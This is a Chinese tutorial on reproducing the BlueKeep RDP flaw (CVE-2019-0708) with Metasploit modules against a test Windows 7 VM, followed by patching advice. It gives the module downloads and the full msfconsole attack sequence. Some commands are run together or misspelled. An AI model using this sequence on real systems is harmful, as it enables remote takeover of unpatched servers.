返回目录:电脑蓝屏
Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。
2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。
漏洞危害:
CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。
漏洞影响范围:
该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。
漏洞复现环境准备:
CVE 2019-0708的exploit地址:
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
ruby脚本地址:
https://github.com/rapid7/metasploit-framework/pull/12283/files
wget下载:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
复制到KALl MSF中
rdp.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
开始复现:
攻击命令
使用msfconsole
进入后使用reload_all重新加载模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用info查看工具相关信息以及设置
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用payload设置攻击载荷
使用exploit开始攻击,等待建立连接
Step1.打开kali,下载4个模块
Step2. 复制到MSF文件中
如果出现无法找到rdp目录,用mkdir创建一个目录,运行文章上的4个复制命令到msf文件夹中。
Step3.运行msfconsole,重新加载模块,use连接模块
输入”msfconsole”启动msf,然后输入” reload_all”重新加载模块
进入msf后,输入search 0708 搜索攻击模块。(小技巧:直接use 编号 就能连接)
连接编号为3的攻击模块cve_2019_0708_bluekeep_rce
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
当连接攻击模块后查看攻击设置命令: show options
RHOSTS=目标
RPORT=端口
Target: 目标版本对应的id
提示:
Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
设置目标ip:set RHOSTS 192.168.1.192(测试机器ip 目标为:win7)
设置攻击版本: set target 3 (目标机器在vm上测试的)
重要一点:set payload windows/x64/shell_bitcp设置攻击载荷(不设置情况可能攻击失败)
设置好目标ip以及targer运行:exploit 开始攻击
经过测试发现会导致大部分机器蓝屏,因为发布的exp为阉割版,所以大家请谨慎测试。
修复方案
1、最简便的方法就是安装一个安全管家,比如火绒、360之类的
2、把系统的自动更新打开或者到微软官网下载补丁
3、设置防火墙规则,并关闭3389端口